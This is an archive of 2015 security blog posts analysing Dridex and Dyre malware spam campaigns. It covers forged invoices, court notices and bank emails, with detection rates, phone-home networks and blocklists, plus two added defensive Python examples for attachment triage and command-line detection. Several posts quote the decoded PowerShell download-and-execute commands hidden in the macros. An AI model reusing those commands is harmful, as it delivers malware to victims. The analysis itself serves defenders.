Wednesday, 25 March 2015

Malware spam: "Invoice ID:12ab34" / "123"

This terse spam has a malicious attachment:
From:    Gerry Carpenter
Date:    25 March 2015 at 12:58
Subject:    Invoice ID:34bf33

There is an Excel attachment with the same semi-random reference number as the subject (in the sample I saw it was 34bf33.xls) which currently has zero detections. Unlike most recent document-based attacks, this does not contain a macro, but instead has an embedded OLE object that will run a VBscript if clicked. The spreadsheet itself is designed to get the victim to click and run that object.

Automated analysis doesn't show very much, but it does show the screenshots [1] [2]. I haven't been able to extract the VBscript in a neat enough format, but what did interest me is this novel obfuscation [pastebin] which actually just executes this:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; Start-Process %TEMP%\JIOiodfhioIH.exe;
Despite all the mucking about with expanding a CAB file, the downloaded file is actually an EXE file all along so nothing is done to it. This file has a detection rate of 7/56, and the Payload Security report shows it communicating with the following IPs: (MWTV, Latvia) (DorukNet, Turkey) (, Japan)

The payload is most likely Dridex.

Recommended blocklist:


Malware spam: "James Dudley []" / "Payment 1142"

This spam email is yet another forgery pretending to be from a wholly legitimate company. It is one of a series of emails spoofing Cambridgeshire firms, and it comes with a malicious attachment.

From:    James Dudley []
Date:    25 March 2015 at 09:38
Subject:    Payment 1142

Payment sheet attached.


T    01353 624023
F    01353 624043

Hitec Ltd
23 Regal Drive

This message has been scanned for viruses and malicious content by Green Duck SpamLab 
I have only seen a single sample of this, with an attachment Payment 1142.doc which has a VirusTotal detection rate of 5/57. It contains this malicious macro [pastebin] which attempts to download a component from:

..which is then saved as %TEMP%\sollken1.2.8.exe; this has a detection rate of 12/57. Automated analysis of this binary is pending, but is so far inconclusive.

Incidentally, the macro contains this snippet:

' (File name: AddNewSheet.bas)
' Author: SENOO, Ken
' (Last update: 2015-03-10T18:38+09:00)

All that means is that this Ken Senoo created and freely licensed a Visual Basic module that the bad guys are using. It does not mean that they have anything at all to do with this malware attack.


UPDATE: this interesting new tool from Payload Security gives some insight as to what the malware does. In particular, it phones home to: (Steadfast Networks, US) (OneGbits, Lithuania) (Orange S.A., France) (Tata Indicom, India) (Digital Networks aka DINETHOSTING, Russia)

Recommended blocklist:

Tuesday, 24 March 2015

Malware spam: "Notice to Appear" / "Notice to appear in Court #0000310657"

These two emails come with a malicious attachment:

From:    County Court []
Date:    24 March 2015 at 16:45
Subject:    AERO, Notice to Appear

This is to inform you to appear in the Court on the March 31 for your case hearing.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can review complete details of the Court Notice in the attachment.

Yours faithfully,
Lester Hicks,
Court Secretary.


From:    District Court []
Date:    24 March 2015 at 16:44
Subject:    AERO, Notice to appear in Court #0000310657

Dear Aero,

This is to inform you to appear in the Court on the March 28 for your case hearing.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: If you do not come, the case will be heard in your absence.

You can review complete details of the Court Notice in the attachment.

Cody Bowman,
District Clerk.

In these two cases the attachments were named and containing the malicious scripts Court_Notification_0000310657.doc.js [VirusTotal 7/57] [pastebin] [deobfuscated] and Notice_to_Appear_000283436.doc.js [VirusTotal 6/57] [pastebin] [deobfuscated] respectively.

These scripts attempt to download malicious code from the following sites:

Details in the download locations vary, but are in the format:

This leads to a randomly-named file with a GIF extension which is actually one of two malicious EXE files, with detection rates of 6/57 and 4/56. One of those produces a valid Malwr report, the other smaller EXE doesn't seem to do anything.

The executable that seems to do something POSTs to a Turkish server at (Radore Veri Merkezi Hizmetleri A.S.). Various Malwr reports [1] [2] [3] [4] [5] [6] indicate badness on at least the following IPs:

I would suggest blocking at least those IPs, or perhaps or if you don't mind blocking access to a few legitimate Turkish sites you could perhaps block

I am not 100% certain of the payload, however some servers in that cluster have been fingered for serving the Trapwot fake anti-virus software.


Malware spam: "Mary Watkins []" / "Invoice"

This spam email message does not come from Ely Design Group, but is in fact just a simple forgery. Ely Design Group's systems have not been compromised in any way. This email comes with a malicious attachment.

From:    Mary Watkins []
Date:    24 March 2015 at 07:23
Subject:    Invoice


As promised!

Mary Watkins
Office Manager
Ely Design Group
Attached is a Word document named S22C-6e15031710060.doc with a low detection rate of 2/57. It contains this malicious macro [pastebin], which then downloads a component from the following location:

The file is saved as %TEMP%\PALmisc2.5.2.exe and has a VirusTotal detection rate of 6/57.

Automated analysis tools [1] [2] [3] [4] [5] indicate that the binary crashes in those test environments, although whether or not it will work on a live PC is another matter. The payload (if it works) is almost definitely the Dridex banking trojan.

Friday, 20 March 2015

Something evil on and

I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on (root SA, Luxembourg) [VT report] being reached via (AirISP, Russia) [VT report].

Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:

For practical purposes though I recommend you block traffic to the IPs rather than the domains.

Recommended blocklist:

These following nearby IPs have also been distributing badness. I recommend you block these too:

Thursday, 19 March 2015

Malware spam: "Invoice ID:987654321 in attachment." from random senders

This spam has no body text and a randomly-generated sender name and invoice ID number. Sample subjects include:

Invoice ID:07dda8035 in attachment.
Invoice ID:09bf252 in attachment.
Invoice ID:108df399 in attachment.
Invoice ID:11847972 in attachment.
Invoice ID:156a35519 in attachment.
Invoice ID:16bb539 in attachment.
Invoice ID:16de0833 in attachment.
Invoice ID:17ff9887 in attachment.
Invoice ID:19b5b30 in attachment.

Sample senders:

Angelia Oliver
Annette Hunter
Austin Bennett
Belinda Cameron
Brittney Dixon
Buster Nolan
Candace Bowers
Christian Kemp
Clarissa Gentry
Cruz Mcintosh
Doug Haney
Dylan Poole
Erwin Hale
Gordon Downs
Hallie Neal
Oscar Bradshaw
Reyna Carver
Rosalie Acevedo
Sid Alston
Sophia Scott
Tanner Puckett
Tia Kline
Trudy Hensley
Valerie Delaney
Ivy Stokes
Jeanie Frye
Karin Frank
Kayla Travis
Mai Rowland
Marilyn Fleming
Minerva Glover

The Word document contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the same as the one used in this attack.

Malware spam: "Aspiring Solicitors Debt Collection" has mystery XML attachment

This spam has a malicious attachment.

Date:    19 March 2015 at 12:52
Subject:    Aspiring Solicitors Debt Collection

Aspiring Solicitors

Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance:       2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.

You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.

Court Fees  GBP 245.00

Solicitors Costs  GBP 750.00

Cheques or Postal Orders should be  made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.

Yours faithfully,
Shawn Ballard
Aspiring Solicitors

Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
United Kingdom
Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indications are that this can run even with macros disabled. Each attachment has a unique MD5.

Analysis is currently pending; this appears to have several new techniques to avoid detection. According to this Twitter conversation one version attempts to download a binary from although this is currently timing out for me. For security analysts, a sample of the XML file can be found here.

IMPORTANT: if you have opened this document in Word then there is a good chance that you are infected. I would recommend that you shut down any machine that has opened this. Anti-virus detections are currently very poor, but vendors may have signatures available soon; I would wait 24 hours before attempting to disinfect any infected machine. Dridex collects banking passwords, so it is important that machines are not used for financial transactions.


This particular attack uses some novel features. Opening the Word document reveals what appears to be an embedded XLS file:

There's some interesting metadata.. created by "Dredex" of "Ph0enix Team", then modified by "ПРроываААА".

In the typical attack scenario, opening the embedded file will force the macro to run. In this case, I used LibreOffice on a Linux box which does not support VBA. This revealed the malicious code, which looks like this.

A bit of copy-and-pasting reveals nothing more sophisticated than some Base 64 encoded text that attempts to run one of the following commands:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
FYI, those IPs are allocated as follows: (Servachok Ltd, Russia) (Sobis OOO, Russia) (Eximius LLC, Russia) (OVH, France / Bitweb LLC, Russia)

"shake.exe" has a VirusTotal detection rate of 3/57. Between that VirusTotal report and this Malwr report we can see the malware attempting to connect to: (Digital Networks aka DINETHOSTING, Russia) (OneGbits, Lithuania) (KPN Zakelijk Internet, Netherlands)

Further analysis is pending.

Recommended blocklist:

Malware spam: "" / "Your Sales Order"

This spam run pretends to come from Marflow Engineering but it doesn't, instead it is a simple forgery. Marflow are not sending out this email, nor have their systems been compromised in any way.

Date:    19 March 2015 at 09:13
Subject:    Your Sales Order

Your order acknowledgment is attached.

Please check carefully and advise us of any issues.

Best regards

Attached is a file 611866.xls which appears to come in at least three different versions. But due to an error in the way the spam has been created, the attachment is actually corrupt and (depending on your version of Excel) attempting to open it gives this error:

The file you are trying to open, '611866.xls', is in a different format than specified by the file extension. Verify that the file is not corrupted and is from a trusted source before opening the file. Do you want to open the file now?
Clicking OK loads up what looks like gobbledegook.

If you see this, then you have had a lucky escape because the attachment is in the wrong format and is Base 64 encoded. If you manually run a Base 64 decoder against it then you end up with a malicious XLS file, in one of three different flavours with low detection rates [1] [2] [3] which in turn each contain a slightly different malicious macro [1] [2] [3] which then attempt to download from the following locations:

This is saved in the %TEMP% folder under the filenames pirit86.exe, tikapom64.exe and Trekaldo51.exe (although the binary is the same in each case). This malicious binary has a detection rate of just 2/57 and according to the Malwr report, it phones home to the following IPs: (Pirix, Russia) (OMC Computers & Communications, Israel) (Gamma Telecom, UK) (University of Cambridge, UK) (Deniz Toprak, Turkey / B2 Net Solutions, US) (DAEMINCUSTOM, Korea) (Aqua Networks Ltd, Germany)

It also drops another version of the downloader, edg1.exe, which has a detection rate of 1/56, and a DLL with a detection rate also of 1/57. The payload is the Dridex banking trojan.
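The Base 64 wrapped XLS described above, the .doc that is really XML, and the GIF that is really an EXE are all cases of file content not matching the extension. One way to check for that during attachment triage, as an added example that is not part of the original post (the sample bytes are constructed header stubs, random.gif and timesheet.xls are made-up names, and the function names are illustrative):

```python
import base64
import binascii
import os

# Leading bytes of the container types this page mentions.
MAGIC = [
    (b"MZ", "exe"),                                  # Windows PE executable
    (b"MSCF", "cab"),                                # Microsoft Cabinet archive
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),   # legacy .doc/.xls container
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"PK\x03\x04", "zip"),
]
# Content type each extension should sniff as.
EXPECTED = {".exe": "exe", ".scr": "exe", ".cab": "cab", ".gif": "gif",
            ".doc": "ole2", ".xls": "ole2", ".zip": "zip"}


def sniff(data):
    """Return a short type name from the leading bytes, or None if unknown."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    # XML may be preceded by a UTF-8 byte-order mark or whitespace.
    if data.lstrip(b"\xef\xbb\xbf \t\r\n").startswith(b"<?xml"):
        return "xml"
    return None


def unwrap_base64(data):
    """Return the decoded bytes if data is wholly Base64 text, else None."""
    compact = b"".join(data.split())
    if len(compact) < 16 or len(compact) % 4:
        return None
    try:
        return base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None


def triage(filename, data):
    """Compare the extension with the sniffed content of one attachment."""
    ext = os.path.splitext(filename)[1].lower()
    actual, wrapped = sniff(data), False
    if actual is None:
        decoded = unwrap_base64(data)
        if decoded is not None and sniff(decoded) is not None:
            actual, wrapped = sniff(decoded), True
    expected = EXPECTED.get(ext)
    mismatch = wrapped or (actual is not None and expected is not None
                           and actual != expected)
    return {"file": filename, "declared": ext, "actual": actual,
            "base64_wrapped": wrapped, "suspicious": mismatch}


# Constructed samples: a few header bytes plus padding, no real payloads.
OLE2 = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24
SAMPLES = [
    ("random.gif", b"MZ\x90\x00" + b"\x00" * 28),    # EXE served as GIF
    ("611866.xls", base64.b64encode(OLE2)),          # Base64 text, not a workbook
    ("802186031.doc", b'<?xml version="1.0"?><w:wordDocument/>'),
    ("timesheet.xls", OLE2),                         # genuine OLE2 container
]

if __name__ == "__main__":
    for name, blob in SAMPLES:
        print(triage(name, blob))
```
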

Recommended blocklist:

Wednesday, 18 March 2015

Malware spam: "JP Morgan Access []" / "FW: Customer account docs"

This fake financial spam comes with a malicious attachment.

From:    JP Morgan Access []
Date:    18 March 2015 at 17:49
Subject:    FW: Customer account docs

JP Morgan

We have received the following documents regarding your account, if you would like to confirm the changes please check / view the documents please click here.

Carrie Tolstedt
Carrie L. Tolstedt
Senior Executive Vice President
Community Banking
J.P. Morgan Treasury and Securities Services

This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.

As it happens, Carrie L Tolstedt is a real executive... at Wells Fargo. The lady in the picture is another Wells Fargo employee entirely.

But anyway, this is a simple forgery containing a link to a file at Cubby which downloads as and contains a malicious file Documents_JP3922PV8.exe which has an icon to make it look like an Adobe Acrobat file.

The executable has a low VirusTotal detection rate of 3/57.  Various automated analysis tools [1] [2] [3] [4] show the malware downloading additional components from:

It then attempts to POST data to an IP at (Vsevnet Ltd. Russia) which is a critical IP to block if you want to protect yourself against this type of Upatre / Dyre attack.

The Malwr report also shows that amongst other things it downloads an executable lwxzqrk36.exe which has a detection rate of just 2/57. That Malwr report also shows that it downloads and pops up a PDF about drone strikes.

Presumably this PDF pops up to make the victim think that they have been duped into opening some politically-themed spam. Instead, they have actually installed the Dyre banking trojan.. in other words, the victim may well think that it is nothing serious when it really is.

The download locations for this Upatre/Dyre combination change all the time, but the IP address of  has been around for a little while. Also, it is a characteristic of this malware that it calls out to to determine the client IP address.. monitoring for traffic going to that location can be a useful indicator of infection.


Malware spam: "Your online Submission"

This spam leads to a malicious ZIP file hosted either on Dropbox or Cubby.

Date:    18 March 2015 at 13:19
Subject:    Your online Submission

Electronic Submission Gateway

Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.

To view/download your form to the Government Gateway please visit

This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail. - the best place to find government services and information - Opens in new window

The best place to find government services and information
The link leads to an archive file which in turn contains a malicious binary Avis_De_Paiement.scr which has a VirusTotal detection rate of 16/57. ThreatExpert and Comodo CAMAS report that it downloads components from the following locations:

My sources indicate that this most likely phones home to (Vsevnet Ltd. Russia) which is a known bad IP that I recommend blocking. The payload appears to be the Upatre downloader leading to the Dyre banking trojan.

Malware spam: "December unpaid invoice notification"

This spam comes with no body text, but does come with a malicious attachment.

From:    Korey Mack
Date:    18 March 2015 at 11:04
Subject:    December unpaid invoice notification
So far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\'); expand %TEMP%\ %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;
Although the EXE file from (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.
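The download, expand and start chain in the command line above is the same one seen in the other PowerShell command lines on this page, which makes it a workable detection target. The following is an added example, not part of the original post: it checks process command lines for that chain, using constructed sample events with placeholder URLs and .cab names, and the function names are illustrative.

```python
import re

# The stages of the chain, as they appear in the command lines quoted on this page.
BYPASS = re.compile(r"-ExecutionPolicy\s+bypass\b", re.I)
HIDDEN = re.compile(r"-WindowStyle\s+Hidden\b", re.I)
DOWNLOAD = re.compile(
    r"DownloadFile\(\s*'(?P<url>[^']*)'\s*,\s*'(?P<dest>[^']*)'\s*\)", re.I)
EXPAND = re.compile(r"\bexpand\s+(?P<src>\S+)\s+(?P<dst>\S+?\.exe)\b", re.I)
LAUNCH = re.compile(r"\b(?:Start-Process|start)\s+(?P<exe>\S+?\.exe)\b", re.I)


def _norm(path):
    """Normalise a path token for comparison (quotes stripped, case folded)."""
    return path.strip("\"'").lower()


def analyse(cmdline):
    """Return a finding dict if cmdline downloads a file and then runs it, else None."""
    if "powershell" not in cmdline.lower():
        return None
    dl, run = DOWNLOAD.search(cmdline), LAUNCH.search(cmdline)
    if not (dl and run):
        return None
    ex = EXPAND.search(cmdline)
    saved, launched = _norm(dl.group("dest")), _norm(run.group("exe"))
    if ex and _norm(ex.group("src")) == saved and _norm(ex.group("dst")) == launched:
        chain = "download-expand-run"
    elif saved == launched:
        chain = "download-run"
    else:
        return None  # the launched file is not the one that was downloaded
    return {
        "chain": chain,
        "url": dl.group("url"),
        "payload": run.group("exe"),
        "policy_bypass": bool(BYPASS.search(cmdline)),
        "hidden_window": bool(HIDDEN.search(cmdline)),
    }


def scan(cmdlines):
    """Return (index, finding) for every command line that matches the chain."""
    hits = []
    for i, line in enumerate(cmdlines):
        finding = analyse(line)
        if finding:
            hits.append((i, finding))
    return hits


# Constructed process-creation command lines. The URLs and the .cab names are
# placeholders (the page's own are elided); the .exe names are from the page.
EVENTS = [
    r"cmd /K powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden "
    r"(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/x.cab',"
    r"'%TEMP%\x.cab'); expand %TEMP%\x.cab %TEMP%\JIOiodfhioIH.exe; "
    r"Start-Process %TEMP%\JIOiodfhioIH.exe;",
    r"cmd /K powershell.exe -ExecutionPolicy bypass -noprofile "
    r"(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/y.cab',"
    r"'%TEMP%\y.cab'); expand %TEMP%\y.cab %TEMP%\huiUGI8t8dsF.exe; "
    r"start %TEMP%\huiUGI8t8dsF.exe;",
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    r"expand C:\drivers\nic.cab -F:* C:\drivers\nic",
    r"powershell.exe (New-Object System.Net.WebClient).DownloadFile("
    r"'http://example.invalid/tool.zip','C:\Tools\tool.zip')",
]

if __name__ == "__main__":
    for index, finding in scan(EVENTS):
        print(index, finding)
```

Only the first two events are reported; a download with no launch, or a launch of a different file, is deliberately not flagged by this check.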

This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs: (Call U Communications, Palestine) (Digital Networks CJSC aka DINETHOSTING, Russia) (OVH, Ireland) (OVH, Latvia) (Reliance Communication, India) (Private Layer INC, Switzerland)

Recommended blocklist:

Malware spam: "Confirmation of Booking" / "NWN Media Ltd" / "Della Richardson"

This spam is not from NWN Media Ltd but is instead a simple forgery sent out to random email addresses with a malicious attachment. NWN Media are not responsible for this spam, nor have their systems been compromised.

From: []
Date:    18 March 2015 at 08:34
Subject:    Confirmation of Booking

This booking confirmation forms a binding contract between yourselves and NWN Media Ltd.
If you do not agree with any of the details above then please contact the named sales representative on the above number immediately.

Yours sincerely,

NWN Media Ltd
Attached is a file NWN Confirmation Letter.doc which I have so far seen in two different versions, both with low detection rates [1] [2] which contain slightly different malicious macros [1] [2] which then go and download a malicious binary from one of the following locations:

These are saved as %TEMP%\zakilom86.exe and %TEMP%\Pikadlo64.exe respectively. The binaries are actually identical and have a VirusTotal detection rate of 5/57. According to the Malwr report this binary attempts to communicate with the following IPs: (Relink Ltd, Russia) (Selectel Ltd, Russia) (OVH, France) (Clodo-Cloud / IT House, Russia) (Digital Networks CJSC aka DINETHOSTING, Russia)

It then drops what appears to be another version of itself called edg1.exe onto the target system [VT 2/55] along with a malicious Dridex DLL [VT 3/55]

Recommended blocklist:

Saturday, 14 March 2015

Quttera fails and spews false positives everywhere

By chance, I found out that my blog had been blacklisted by Quttera. No big deal, because it happens from time-to-time due to the nature of the content on the site. But I discovered that it isn't just my blog, but Quttera also block industry-leading sites such as Cisco, VMware, Sophos, MITRE, AVG and Phishtank.

For example, at the time of writing the following domains are all blacklisted by Quttera (clicking the link shows the current blacklisting status):

Cisco's blacklisting entry looks like this:

Now, you can ask Quttera to unblacklist your site for free by raising a ticket but the most prominent link leads to a paid service for £60/year. Hmmm.

I don't think that I will rush to subscribe to that. Obviously, something is seriously wrong with the algorithm in use; some of these sites should obviously be whitelisted. Quttera also doesn't understand the difference between a malicious domain or IP being mentioned and such a site being linked to or injected into a site.

I guess there are many, many more domains that are in a similar situation. Perhaps you might want to check your own web properties and share your findings in the comments?

Friday, 13 March 2015

Malware spam: "Invoice (13\03\2015) for payment to COMPANY NAME"

There is a series of malware spams in progress in the following format:

Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC

Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run yesterday and one new one with zero detections which contains this malicious macro, which downloads another component from:

This is saved as %TEMP%\GHjkdfg.exe - incidentally, this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53 and the Malwr report shows it phoning home to which is also in the same network neighbourhood.

The binary also drops a malicious Dridex DLL with a detection rate of 5/56. This is the same DLL as used in this spam run earlier today.

Recommended blocklist:

Malware spam: "" / "Invoice: 2262004"

This fake Penta Foods spam run is another variant of this and it comes with a malicious attachment. Penta Foods are not sending this email, instead it is a simple forgery.

Date:    13 March 2015 at 07:50
Subject:    Invoice: 2262004

Please find attached invoice :  2262004
  Any queries please contact us.

Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.

Attached is a Word document R-1179776.doc which actually comes in two versions, both with zero detection rates, containing one of two malicious macros [1] [2] which then download a component from the following locations:

This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to: (Clodo-Cloud / IT House, Russia)

My sources also indicate that it phones home to: (Webagentur, Austria) (iomart / RapidSwitch, UK)

According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.

Recommended blocklist: